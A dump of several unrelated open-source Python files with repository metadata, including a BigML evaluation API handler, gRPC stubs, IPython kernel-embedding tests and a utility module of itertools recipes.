"name": "Shell",
"bytes": "1210"
}
],
"symlink_target": ""
} |
"""Base class for evaluations' REST calls
https://bigml.com/api/evaluations
"""
try:
import simplejson as json
except ImportError:
import json
from bigml.api_handlers.resourcehandler import ResourceHandlerMixin
from bigml.api_handlers.resourcehandler import check_resource_type, \
get_evaluation_id
from bigml.constants import SUPERVISED_PATHS, TIME_SERIES_PATH, EVALUATION_PATH
class EvaluationHandlerMixin(ResourceHandlerMixin):
    """Mixin providing the REST calls for evaluations.

    This class is used by the BigML class as
    a mixin that provides the REST calls models. It should not
    be instantiated independently.
    """
    def __init__(self):
        """Initializes the EvaluationHandler. This class is intended to be
        used as a mixin on ResourceHandler, that inherits its
        attributes and basic method from BigMLConnection, and must not be
        instantiated independently.
        """
        # self.url is provided by BigMLConnection via the mixin chain
        self.evaluation_url = self.url + EVALUATION_PATH
    def create_evaluation(self, model, dataset,
                          args=None, wait_time=3, retries=10):
        """Creates a new evaluation.

        :param model: id (or dict) of the supervised model or time series
                      to evaluate
        :param dataset: id (or dict) of the dataset to evaluate against
        :param args: optional dict of creation arguments
        :param wait_time: seconds between readiness checks on the origins
        :param retries: number of readiness checks before giving up
        :return: the created evaluation dict, or None when the origin
                 resources never become ready
        """
        create_args = {}
        if args is not None:
            create_args.update(args)
        # evaluations accept any supervised model plus time series
        model_types = SUPERVISED_PATHS[:]
        model_types.append(TIME_SERIES_PATH)
        origin_resources_checked = self.check_origins(
            dataset, model, create_args, model_types=model_types,
            wait_time=wait_time, retries=retries)
        if origin_resources_checked:
            body = json.dumps(create_args)
            return self._create(self.evaluation_url, body)
        # origins never reached a usable state: implicitly returns None
        return
    def get_evaluation(self, evaluation, query_string=''):
        """Retrieves an evaluation.

        The evaluation parameter should be a string containing the
        evaluation id or the dict returned by create_evaluation.
        As evaluation is an evolving object that is processed
        until it reaches the FINISHED or FAULTY state, the function will
        return a dict that encloses the evaluation values and state info
        available at the time it is called.
        """
        check_resource_type(evaluation, EVALUATION_PATH,
                            message="An evaluation id is needed.")
        return self.get_resource(evaluation, query_string=query_string)
    def list_evaluations(self, query_string=''):
        """Lists all your evaluations, optionally filtered by query_string.
        """
        return self._list(self.evaluation_url, query_string)
    def update_evaluation(self, evaluation, changes):
        """Updates an evaluation with the attributes in `changes`.
        """
        check_resource_type(evaluation, EVALUATION_PATH,
                            message="An evaluation id is needed.")
        return self.update_resource(evaluation, changes)
    def delete_evaluation(self, evaluation):
        """Deletes an evaluation.
        """
        check_resource_type(evaluation, EVALUATION_PATH,
                            message="An evaluation id is needed.")
        return self.delete_resource(evaluation)
| {
"content_hash": "2eca3fd736ebbb64e4c90f9294da4406",
"timestamp": "",
"source": "github",
"line_count": 89,
"max_line_length": 79,
"avg_line_length": 34.26966292134831,
"alnum_prop": 0.6426229508196721,
"repo_name": "mmerce/python",
"id": "6974d5aab0c2c2367afb3b3554fa54f22696b920",
"size": "3651",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bigml/api_handlers/evaluationhandler.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1531559"
}
],
"symlink_target": ""
} |
import argparse
import os
import subprocess
parser = argparse.ArgumentParser(description="Runs Java integration tests.")
# repository root: the parent of the directory containing this script
TOOLKIT_ROOT_DIR = os.path.abspath(os.path.join(os.path.dirname(os.path.realpath(__file__)), '..'))
def run():
try:
subprocess.check_call("make test_java", cwd=TOOLKIT_ROOT_DIR, shell=True)
except subprocess.CalledProcessError as e:
print "Tests failed, printing out error reports:"
for filename in os.listdir(os.path.join(TOOLKIT_ROOT_DIR, "src/java/target/surefire-reports")):
if filename.startswith("com.dnanexus."):
print open(os.path.join(TOOLKIT_ROOT_DIR, "src/java/target/surefire-reports", filename)).read().strip()
raise e
if __name__ == '__main__':
    # no CLI options are defined yet; parsing still gives --help for free
    args = parser.parse_args()
    run()
| {
"content_hash": "58e839d2688fd1760e6ba57cfb5b270f",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 119,
"avg_line_length": 37.76190476190476,
"alnum_prop": 0.6708701134930644,
"repo_name": "jhuttner/dx-toolkit",
"id": "bd275cb0d73a1fcd33e2547596dc427f9a4fedef",
"size": "816",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "build/run_java_integration_tests.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "3198"
},
{
"name": "C",
"bytes": "6957"
},
{
"name": "C++",
"bytes": "1880260"
},
{
"name": "CMake",
"bytes": "26162"
},
{
"name": "Groovy",
"bytes": "8855"
},
{
"name": "Java",
"bytes": "2177401"
},
{
"name": "Makefile",
"bytes": "50221"
},
{
"name": "NSIS",
"bytes": "17861"
},
{
"name": "Perl",
"bytes": "46855"
},
{
"name": "PowerShell",
"bytes": "1442"
},
{
"name": "Python",
"bytes": "2261586"
},
{
"name": "R",
"bytes": "550095"
},
{
"name": "Ruby",
"bytes": "78045"
},
{
"name": "Shell",
"bytes": "58977"
}
],
"symlink_target": ""
} |
'''Script to combine text by by file names of main three periods: 1848-1900; 1901-1948; 1949-1978'''
from os import walk
import os
from collections import defaultdict
from pprint import pprint
FOLDER = '/Users/deborah/Documents/scripts/python_work/project2016/smelly_london/Full text'  # input: one report file per year
OUTPUT_FOLDER = '/Users/deborah/Documents/scripts/python_work/project2016/smelly_london/Combined text_by_period/'  # output: one combined file per period
def create_mapping():
    """Group the report filenames found under FOLDER by period bucket.

    Returns a dict mapping a period label to the list of filenames whose
    year token (second dot-separated component) falls in that period.
    """
    buckets = defaultdict(list)
    for _dirpath, _dirnames, filenames in walk(FOLDER):
        for filename in filenames:
            bucket = get_year_bucket(filename.split('.')[1])
            if bucket:
                buckets[bucket].append(filename)
    return buckets
def get_year_bucket(year):
    """Map a report year to one of the three period buckets.

    :param year: year as a string (or anything int() accepts)
    :return: '1848-1900', '1901-1948' or '1949-1978', or None when the
             value is not numeric or lies outside all three periods
             (callers skip falsy buckets)
    """
    try:
        year = int(year)
    except (TypeError, ValueError):
        # token was not a year at all (e.g. a file extension fragment)
        return None
    if 1848 <= year <= 1900:
        return '1848-1900'
    if 1901 <= year <= 1948:
        # was range(1901, 1950), which wrongly claimed 1949 for this
        # bucket; the bucket labels define the intended boundaries
        return '1901-1948'
    if 1949 <= year <= 1978:
        return '1949-1978'
    # out-of-range years used to leak back as ints, which later crashed
    # concatenate_files() on string concatenation; report "no bucket"
    return None
def concatenate_files(mapping):
    """Write one combined text file per period into OUTPUT_FOLDER.

    :param mapping: dict of period label -> list of filenames in FOLDER
    """
    for period, filenames in mapping.items():
        target_path = OUTPUT_FOLDER + period + '.txt'
        with open(target_path, 'w') as combined:
            for name in filenames:
                source_path = FOLDER + '/' + name
                with open(source_path) as source:
                    for line in source:
                        combined.write(line)
def main():
    """Build the period mapping and write the combined period files."""
    concatenate_files(create_mapping())
if __name__ == "__main__":
main()
| {
"content_hash": "dc81e2d83f160513263648ddf2665d29",
"timestamp": "",
"source": "github",
"line_count": 59,
"max_line_length": 113,
"avg_line_length": 27.372881355932204,
"alnum_prop": 0.6086687306501548,
"repo_name": "Smelly-London/datavisualisation",
"id": "9fe230c99ff37f1a90f32828dce8a8aaf9a72cb7",
"size": "1615",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "NLTK_textmine/combine_txt_three_periods.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "4133"
},
{
"name": "Python",
"bytes": "1733727"
}
],
"symlink_target": ""
} |
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
import friendship_pb2 as friendship__pb2
class FriendshipStub(object):
    """Missing associated documentation comment in .proto file."""
    # Generated gRPC client stub: one callable attribute per RPC of the
    # Friendship service, bound to the matching friendship_pb2 serializers.

    def __init__(self, channel):
        """Constructor.
        Args:
            channel: A grpc.Channel.
        """
        self.Create = channel.unary_unary(
                '/Friendship/Create',
                request_serializer=friendship__pb2.Person.SerializeToString,
                response_deserializer=friendship__pb2.CreateResult.FromString,
                )
        self.ListFriends = channel.unary_stream(
                '/Friendship/ListFriends',
                request_serializer=friendship__pb2.PersonEmail.SerializeToString,
                response_deserializer=friendship__pb2.Person.FromString,
                )
        self.CommonFriendsCount = channel.stream_unary(
                '/Friendship/CommonFriendsCount',
                request_serializer=friendship__pb2.PersonEmail.SerializeToString,
                response_deserializer=friendship__pb2.CommonFriendsResult.FromString,
                )
        self.MakeFriends = channel.stream_stream(
                '/Friendship/MakeFriends',
                request_serializer=friendship__pb2.FriendshipRequest.SerializeToString,
                response_deserializer=friendship__pb2.FriendshipResponse.FromString,
                )
class FriendshipServicer(object):
    """Missing associated documentation comment in .proto file."""
    # Generated gRPC service base class: subclass and override the methods
    # below; each default implementation reports UNIMPLEMENTED.

    def Create(self, request, context):
        """returns email (as the id)
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def ListFriends(self, request, context):
        """lists all friends for a given email
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def CommonFriendsCount(self, request_iterator, context):
        """list number of friends for all given emails
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def MakeFriends(self, request_iterator, context):
        """associate friends and returns true if friendship created or false if a given Person cannot be found
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')
def add_FriendshipServicer_to_server(servicer, server):
    # Generated registration helper: wires each servicer method to its RPC
    # name with the matching deserializer/serializer pair.
    rpc_method_handlers = {
            'Create': grpc.unary_unary_rpc_method_handler(
                    servicer.Create,
                    request_deserializer=friendship__pb2.Person.FromString,
                    response_serializer=friendship__pb2.CreateResult.SerializeToString,
            ),
            'ListFriends': grpc.unary_stream_rpc_method_handler(
                    servicer.ListFriends,
                    request_deserializer=friendship__pb2.PersonEmail.FromString,
                    response_serializer=friendship__pb2.Person.SerializeToString,
            ),
            'CommonFriendsCount': grpc.stream_unary_rpc_method_handler(
                    servicer.CommonFriendsCount,
                    request_deserializer=friendship__pb2.PersonEmail.FromString,
                    response_serializer=friendship__pb2.CommonFriendsResult.SerializeToString,
            ),
            'MakeFriends': grpc.stream_stream_rpc_method_handler(
                    servicer.MakeFriends,
                    request_deserializer=friendship__pb2.FriendshipRequest.FromString,
                    response_serializer=friendship__pb2.FriendshipResponse.SerializeToString,
            ),
    }
    generic_handler = grpc.method_handlers_generic_handler(
            'Friendship', rpc_method_handlers)
    server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Friendship(object):
    """Missing associated documentation comment in .proto file."""
    # Generated convenience wrappers: one static method per RPC that opens
    # a channel to *target* and performs the call in one step.

    @staticmethod
    def Create(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/Friendship/Create',
            friendship__pb2.Person.SerializeToString,
            friendship__pb2.CreateResult.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def ListFriends(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_stream(request, target, '/Friendship/ListFriends',
            friendship__pb2.PersonEmail.SerializeToString,
            friendship__pb2.Person.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def CommonFriendsCount(request_iterator,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.stream_unary(request_iterator, target, '/Friendship/CommonFriendsCount',
            friendship__pb2.PersonEmail.SerializeToString,
            friendship__pb2.CommonFriendsResult.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def MakeFriends(request_iterator,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.stream_stream(request_iterator, target, '/Friendship/MakeFriends',
            friendship__pb2.FriendshipRequest.SerializeToString,
            friendship__pb2.FriendshipResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| {
"content_hash": "7d734df5c3649cbc9e97baadf6a2d35c",
"timestamp": "",
"source": "github",
"line_count": 168,
"max_line_length": 110,
"avg_line_length": 41.23809523809524,
"alnum_prop": 0.6280311778290993,
"repo_name": "ganeshmurthy/qpid-dispatch",
"id": "6510b7d78784a4018c9b2b1c012097bd2d04b590",
"size": "6998",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "tests/friendship_pb2_grpc.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "2695814"
},
{
"name": "C++",
"bytes": "359957"
},
{
"name": "CMake",
"bytes": "54018"
},
{
"name": "CSS",
"bytes": "49129"
},
{
"name": "Dockerfile",
"bytes": "3230"
},
{
"name": "HTML",
"bytes": "2320"
},
{
"name": "JavaScript",
"bytes": "737682"
},
{
"name": "Objective-C",
"bytes": "1976"
},
{
"name": "Python",
"bytes": "2547017"
},
{
"name": "Shell",
"bytes": "34107"
}
],
"symlink_target": ""
} |
"""test IPython.embed_kernel()"""
#-------------------------------------------------------------------------------
# Copyright (C) 2012 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-------------------------------------------------------------------------------
#-------------------------------------------------------------------------------
# Imports
#-------------------------------------------------------------------------------
import os
import shutil
import sys
import tempfile
import time
from contextlib import contextmanager
from subprocess import Popen, PIPE
import nose.tools as nt
from IPython.zmq.blockingkernelmanager import BlockingKernelManager
from IPython.utils import path, py3compat
#-------------------------------------------------------------------------------
# Tests
#-------------------------------------------------------------------------------
def setup():
    """setup temporary IPYTHONDIR for tests"""
    global IPYTHONDIR
    global env
    global save_get_ipython_dir
    # isolate the tests in a throwaway IPython dir, propagated both via
    # the subprocess environment and by monkey-patching get_ipython_dir;
    # teardown() reverses both
    IPYTHONDIR = tempfile.mkdtemp()
    env = os.environ.copy()
    env["IPYTHONDIR"] = IPYTHONDIR
    save_get_ipython_dir = path.get_ipython_dir
    path.get_ipython_dir = lambda : IPYTHONDIR
def teardown():
    """Restore get_ipython_dir and remove the temporary IPYTHONDIR."""
    path.get_ipython_dir = save_get_ipython_dir
    try:
        shutil.rmtree(IPYTHONDIR)
    except (OSError, IOError):
        # no such file
        pass
@contextmanager
def setup_kernel(cmd):
    """start an embedded kernel in a subprocess, and wait for it to be ready

    Returns
    -------
    kernel_manager: connected KernelManager instance
    """
    kernel = Popen([sys.executable, '-c', cmd], stdout=PIPE, stderr=PIPE, env=env)
    # the embedded kernel writes its connection file under the profile's
    # security dir, named after the subprocess pid
    connection_file = os.path.join(IPYTHONDIR,
                                    'profile_default',
                                    'security',
                                    'kernel-%i.json' % kernel.pid
    )
    # wait for connection file to exist, timeout after 10s
    tic = time.time()
    while not os.path.exists(connection_file) and kernel.poll() is None and time.time() < tic + 10:
        time.sleep(0.1)
    if kernel.poll() is not None:
        # subprocess died before producing a connection file
        o,e = kernel.communicate()
        e = py3compat.cast_unicode(e)
        raise IOError("Kernel failed to start:\n%s" % e)
    if not os.path.exists(connection_file):
        if kernel.poll() is None:
            kernel.terminate()
        raise IOError("Connection file %r never arrived" % connection_file)
    km = BlockingKernelManager(connection_file=connection_file)
    km.load_connection_file()
    km.start_channels()
    try:
        yield km
    finally:
        # always disconnect and kill the subprocess, even on test failure
        km.stop_channels()
        kernel.terminate()
def test_embed_kernel_basic():
    """IPython.embed_kernel() is basically functional"""
    # script executed in the subprocess: embeds a kernel inside go()
    cmd = '\n'.join([
        'from IPython import embed_kernel',
        'def go():',
        '    a=5',
        '    b="hi there"',
        '    embed_kernel()',
        'go()',
        '',
    ])

    with setup_kernel(cmd) as km:
        shell = km.shell_channel

        # oinfo a (int)
        msg_id = shell.object_info('a')
        msg = shell.get_msg(block=True, timeout=2)
        content = msg['content']
        nt.assert_true(content['found'])

        # execute inside the embedded namespace
        msg_id = shell.execute("c=a*2")
        msg = shell.get_msg(block=True, timeout=2)
        content = msg['content']
        nt.assert_equals(content['status'], u'ok')

        # oinfo c (should be 10)
        msg_id = shell.object_info('c')
        msg = shell.get_msg(block=True, timeout=2)
        content = msg['content']
        nt.assert_true(content['found'])
        nt.assert_equals(content['string_form'], u'10')
def test_embed_kernel_namespace():
    """IPython.embed_kernel() inherits calling namespace"""
    cmd = '\n'.join([
        'from IPython import embed_kernel',
        'def go():',
        '    a=5',
        '    b="hi there"',
        '    embed_kernel()',
        'go()',
        '',
    ])

    with setup_kernel(cmd) as km:
        shell = km.shell_channel

        # oinfo a (int): locals of go() must be visible in the kernel
        msg_id = shell.object_info('a')
        msg = shell.get_msg(block=True, timeout=2)
        content = msg['content']
        nt.assert_true(content['found'])
        nt.assert_equals(content['string_form'], u'5')

        # oinfo b (str)
        msg_id = shell.object_info('b')
        msg = shell.get_msg(block=True, timeout=2)
        content = msg['content']
        nt.assert_true(content['found'])
        nt.assert_equals(content['string_form'], u'hi there')

        # oinfo c (undefined): names outside the calling frame stay absent
        msg_id = shell.object_info('c')
        msg = shell.get_msg(block=True, timeout=2)
        content = msg['content']
        nt.assert_false(content['found'])
def test_embed_kernel_reentrant():
    """IPython.embed_kernel() can be called multiple times"""
    cmd = '\n'.join([
        'from IPython import embed_kernel',
        'count = 0',
        'def go():',
        '    global count',
        '    embed_kernel()',
        '    count = count + 1',
        '',
        # NOTE: no comma after 'while True:' -- implicit string
        # concatenation yields the one-liner 'while True:    go()',
        # which is still valid Python
        'while True:'
        '    go()',
        '',
    ])
    with setup_kernel(cmd) as km:
        shell = km.shell_channel
        for i in range(5):
            # each loop iteration re-embeds; count tracks completed embeds
            msg_id = shell.object_info('count')
            msg = shell.get_msg(block=True, timeout=2)
            content = msg['content']
            nt.assert_true(content['found'])
            nt.assert_equals(content['string_form'], unicode(i))

            # exit from embed_kernel
            shell.execute("get_ipython().exit_now = True")
            msg = shell.get_msg(block=True, timeout=2)
            time.sleep(0.2)
| {
"content_hash": "023604b8ce6dd8b947ccff9fb575457d",
"timestamp": "",
"source": "github",
"line_count": 193,
"max_line_length": 99,
"avg_line_length": 29.94300518134715,
"alnum_prop": 0.516698390725039,
"repo_name": "sodafree/backend",
"id": "0bf8f62ae2200696c4a3a741d41ef2a9f8ebfc2c",
"size": "5779",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "build/ipython/IPython/zmq/tests/test_embed_kernel.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Emacs Lisp",
"bytes": "21800"
},
{
"name": "JavaScript",
"bytes": "1050184"
},
{
"name": "Python",
"bytes": "21215906"
},
{
"name": "Shell",
"bytes": "7557"
},
{
"name": "VimL",
"bytes": "25012"
}
],
"symlink_target": ""
} |
# stdlib
import collections
import inspect
import itertools
import operator
import random
import sys
import time

# third-party
import decorator
def todict(obj, classkey=None):
    """ Serialise object to dictionary, with optional 'classkey'

    dicts are converted in place (values replaced recursively); callables
    are replaced by their name; other iterables become lists; objects with
    a __dict__ become dicts of their converted attributes.  When
    *classkey* is given, each object dict also records its class name
    under that key.
    """
    if isinstance(obj, dict):
        for k in obj.keys():
            obj[k] = todict(obj[k], classkey)
        return obj
    elif callable(obj):
        # not every callable has func_name (builtins, classes, callable
        # instances) -- fall back to __name__/repr instead of raising
        # AttributeError
        return getattr(obj, 'func_name', None) or \
            getattr(obj, '__name__', repr(obj))
    elif hasattr(obj, "__iter__"):
        return [todict(v, classkey) for v in obj]
    elif hasattr(obj, "__dict__"):
        data = dict([(key, todict(value, classkey))
            for key, value in obj.__dict__.iteritems()])
        if classkey is not None and hasattr(obj, "__class__"):
            data[classkey] = obj.__class__.__name__
        return data
    else:
        return obj
# fixed width binary representation (@goo.gl/7udcK)
def bin(x, width):
    """Return x as a binary string of exactly *width* bits (sign-extended)."""
    bits = []
    for shift in xrange(width - 1, -1, -1):
        bits.append(str((x >> shift) & 1))
    return ''.join(bits)
@decorator.decorator
def aspect_import_mut(f, *args, **kwargs):
    """ import module & adds it into the keyword arg namespace """
    try:
        if args:
            # first positional argument names the module (file) under test
            module = args[0].strip()
            if module.endswith(".pyc"):
                module = module[:-len(".pyc")]
            # NOTE(review): ``settings`` is not imported in this module's
            # header -- presumably injected elsewhere; verify before use
            settings.MODULE_UNDER_TEST = module
            kwargs['module'] = __import__(settings.MODULE_UNDER_TEST)
    except ImportError as e:
        print >> sys.stderr, "Module %s cannot be imported" \
            % settings.MODULE_UNDER_TEST
    # the wrapped function runs whether or not the import succeeded
    return f(*args, **kwargs)
@decorator.decorator
def aspect_timer(f, *args, **kwargs):
    """ adds timing aspect to function

    Prints the elapsed wall time to stderr and returns the wrapped
    function's result.
    """
    t0 = time.clock()
    # previously the call result was discarded and the raw function
    # object was returned, so decorated calls never yielded their result
    result = f(*args, **kwargs)
    print >> sys.stderr, \
        "\r\n*** Total time: %.3f seconds ***" % (time.clock()-t0)
    return result
from blessings import Terminal
# shared terminal handle for colourised debug output below
term = Terminal()
# mapping from colour name to the corresponding blessings formatter
term_colors = {
    'black': term.black,
    'red': term.red,
    'green': term.green,
    'yellow': term.yellow,
    'blue': term.blue,
    'magenta': term.magenta,
    'cyan': term.cyan,
    'white': term.white,
}
def recursive_print(v, lvl):
    """Pretty-print a nested value at indent level *lvl* (Python 2).

    dicts print up to four key/value entries (then '...[len]'); sets and
    lists print their first element plus '...[len]'; anything else prints
    '<hidden>'.
    """
    if isinstance(v, dict):
        print '{'
        counter = 0
        for _k,_v in v.iteritems():
            if counter <= 3:
                # class keys print by name, everything else via str()
                if inspect.isclass(_k):
                    print '\t'*lvl+term.bold_blue_on_bright_green(_k.__name__)+':',
                else:
                    print '\t'*lvl+term.bold_blue_on_bright_green(str(_k))+':',
                # recurse only into non-trivial containers
                if any(map(lambda cls: isinstance(_v, cls), [list,set,dict])) \
                    and len(_v) > 1:
                    recursive_print(_v, lvl+1)
                else:
                    print _v
                counter += 1
            else:
                # truncate long dicts after four entries
                print '\t'*lvl+'...','['+str(len(v))+']'
                break
        print '\t'*(max(0,lvl-1))+'}'
    elif isinstance(v, set):
        print list(v)[0],'...','['+str(len(v))+']'
    elif isinstance(v, list):
        print v[0],'...','['+str(len(v))+']'
    else:
        print '<hidden>'
def debug(GLOBALS):
    """Colourised dump of a globals() dict, one entry per key (Python 2).

    Only prints when stdout is a real terminal.
    """
    if term.is_a_tty:
        print '===',term.underline('GLOBALS'), '==='
        for k,v in sorted(GLOBALS.iteritems()):
            # if k not in ['graph_fn_cfg']: continue
            if isinstance(v, basestring):
                print term.bold_cyan_on_bright_green(k) + ':',v
            else:
                # non-string values get the truncating recursive printer
                print term.bold_cyan_on_bright_green(k) + ':',
                recursive_print(v,1)
# itertools recipes
# @ http://docs.python.org/library/itertools.html
def take(n, iterable):
    "Return first n items of the iterable as a list"
    # only ``import itertools`` exists at file level, so islice must be
    # reached through the module (bare ``islice`` was a NameError)
    return list(itertools.islice(iterable, n))
def tabulate(function, start=0):
    "Return function(0), function(1), ..."
    # qualify imap/count through itertools (bare names were NameErrors);
    # itertools.imap keeps this Python-2 only, matching the rest of the file
    return itertools.imap(function, itertools.count(start))
def consume(iterator, n):
    "Advance the iterator n-steps ahead. If n is none, consume entirely."
    # Use functions that consume iterators at C speed.
    # (islice qualified through itertools; collections comes from the
    # module imports)
    if n is None:
        # feed the entire iterator into a zero-length deque
        collections.deque(iterator, maxlen=0)
    else:
        # advance to the empty slice starting at position n
        next(itertools.islice(iterator, n, n), None)
def nth(iterable, n, default=None):
    "Returns the nth item or a default value"
    # islice qualified through itertools (bare name was a NameError)
    return next(itertools.islice(iterable, n, None), default)
def quantify(iterable, pred=bool):
    "Count how many times the predicate is true"
    # the original used bare ``imap`` (never imported -> NameError);
    # a generator expression is equivalent and works on Python 2 and 3
    return sum(pred(x) for x in iterable)
def padnone(iterable):
    """Returns the sequence elements and then returns None indefinitely.

    Useful for emulating the behavior of the built-in map() function.
    """
    # chain/repeat qualified through itertools (bare names were NameErrors)
    return itertools.chain(iterable, itertools.repeat(None))
def ncycles(iterable, n):
    "Returns the sequence elements n times"
    # repeat qualified through itertools (bare name was a NameError)
    return itertools.chain.from_iterable(itertools.repeat(tuple(iterable), n))
def dotproduct(vec1, vec2, sum=sum, imap=itertools.imap, mul=operator.mul):
    # Defaults bind the helpers once at definition time (a CPython
    # local-lookup micro-optimisation); itertools.imap makes this
    # Python-2 only.  Returns sum(vec1[i] * vec2[i]).
    return sum(imap(mul, vec1, vec2))
def flatten(listOfLists):
    "Flatten one level of nesting"
    for sublist in listOfLists:
        for item in sublist:
            yield item
def repeatfunc(func, times=None, *args):
    """Repeat calls to func with specified arguments.

    Example:  repeatfunc(random.random)
    """
    # starmap/repeat qualified through itertools (bare names were NameErrors)
    if times is None:
        return itertools.starmap(func, itertools.repeat(args))
    return itertools.starmap(func, itertools.repeat(args, times))
def pairwise(iterable):
    "s -> (s0,s1), (s1,s2), (s2, s3), ..."
    # tee/izip qualified through itertools (bare names were NameErrors);
    # izip keeps the result lazy and is Python-2 only, like the file
    a, b = itertools.tee(iterable)
    next(b, None)
    return itertools.izip(a, b)
def grouper(n, iterable, fillvalue=None):
    "grouper(3, 'ABCDEFG', 'x') --> ABC DEF Gxx"
    # izip_longest qualified through itertools (bare name was a NameError;
    # Python-2 spelling, matching the file)
    args = [iter(iterable)] * n
    return itertools.izip_longest(fillvalue=fillvalue, *args)
def roundrobin(*iterables):
    "roundrobin('ABC', 'D', 'EF') --> A D E B F C"
    # Recipe credited to George Sakkis
    # cycle/islice qualified through itertools (bare names were NameErrors);
    # the bound ``.next`` method keeps this Python-2 only
    pending = len(iterables)
    nexts = itertools.cycle(iter(it).next for it in iterables)
    while pending:
        try:
            for next in nexts:
                yield next()
        except StopIteration:
            # one input exhausted: drop its slot and keep cycling the rest
            pending -= 1
            nexts = itertools.cycle(itertools.islice(nexts, pending))
def powerset(iterable):
    "powerset([1,2,3]) --> () (1,) (2,) (3,) (1,2) (1,3) (2,3) (1,2,3)"
    pool = list(iterable)
    for size in range(len(pool) + 1):
        for combo in itertools.combinations(pool, size):
            yield combo
def unique_everseen(iterable, key=None):
    "List unique elements, preserving order. Remember all elements ever seen."
    # unique_everseen('AAAABBBCCDAABBB') --> A B C D
    # unique_everseen('ABBCcAD', str.lower) --> A B C D
    seen = set()
    seen_add = seen.add
    if key is None:
        # ifilterfalse qualified through itertools (bare name was a
        # NameError; Python-2 spelling, matching the file)
        for element in itertools.ifilterfalse(seen.__contains__, iterable):
            seen_add(element)
            yield element
    else:
        for element in iterable:
            k = key(element)
            if k not in seen:
                seen_add(k)
                yield element
def unique_justseen(iterable, key=None):
    "List unique elements, preserving order. Remember only the element just seen."
    # unique_justseen('AAAABBBCCDAABBB') --> A B C D A B
    # unique_justseen('ABBCcAD', str.lower) --> A B C A D
    # imap/groupby qualified through itertools and itemgetter through
    # operator (all three were unbound names); imap keeps this Python-2 only
    return itertools.imap(
        next, itertools.imap(operator.itemgetter(1),
                             itertools.groupby(iterable, key)))
def iter_except(func, exception, first=None):
    """ Yield results of repeated *func* calls until *exception* is raised.

    Converts a call-until-exception interface to an iterator interface.
    Like __builtin__.iter(func, sentinel) but uses an exception instead
    of a sentinel to end the loop.

    Examples:
        bsddbiter = iter_except(db.next, bsddb.error, db.first)
        heapiter = iter_except(functools.partial(heappop, h), IndexError)
        dictiter = iter_except(d.popitem, KeyError)
        dequeiter = iter_except(d.popleft, IndexError)
        queueiter = iter_except(q.get_nowait, Queue.Empty)
        setiter = iter_except(s.pop, KeyError)
    """
    try:
        if first is not None:
            yield first()
        while True:
            yield func()
    except exception:
        # the designated exception simply terminates the iterator
        return
def random_product(*args, **kwds):
    "Random selection from itertools.product(*args, **kwds)"
    # relies on Python 2 ``map`` returning a list so it can be repeated
    # with ``*``; ``random`` comes from the module imports
    pools = map(tuple, args) * kwds.get('repeat', 1)
    return tuple(random.choice(pool) for pool in pools)
def random_permutation(iterable, r=None):
    "Random selection from itertools.permutations(iterable, r)"
    # r defaults to a full-length permutation
    pool = tuple(iterable)
    r = len(pool) if r is None else r
    return tuple(random.sample(pool, r))
def random_combination(iterable, r):
    "Random selection from itertools.combinations(iterable, r)"
    # sorting the sampled indices preserves the input order, which is
    # what makes the result a combination; xrange keeps this Python-2 only
    pool = tuple(iterable)
    n = len(pool)
    indices = sorted(random.sample(xrange(n), r))
    return tuple(pool[i] for i in indices)
def random_combination_with_replacement(iterable, r):
    "Random selection from itertools.combinations_with_replacement(iterable, r)"
    # indices may repeat (replacement); sorting preserves input order;
    # xrange keeps this Python-2 only
    pool = tuple(iterable)
    n = len(pool)
    indices = sorted(random.randrange(n) for i in xrange(r))
    return tuple(pool[i] for i in indices)
| {
"content_hash": "21f63d72c27ba44cb76e3fe87b9fe8ae",
"timestamp": "",
"source": "github",
"line_count": 256,
"max_line_length": 95,
"avg_line_length": 33.98046875,
"alnum_prop": 0.603172778480285,
"repo_name": "evandrix/Splat",
"id": "ff8b2141213c40a35bce91d8138713fc5947fb79",
"size": "8699",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "code/mypkg/common.py",
"mode": "33188",
"license": "mit",
"language": [
{
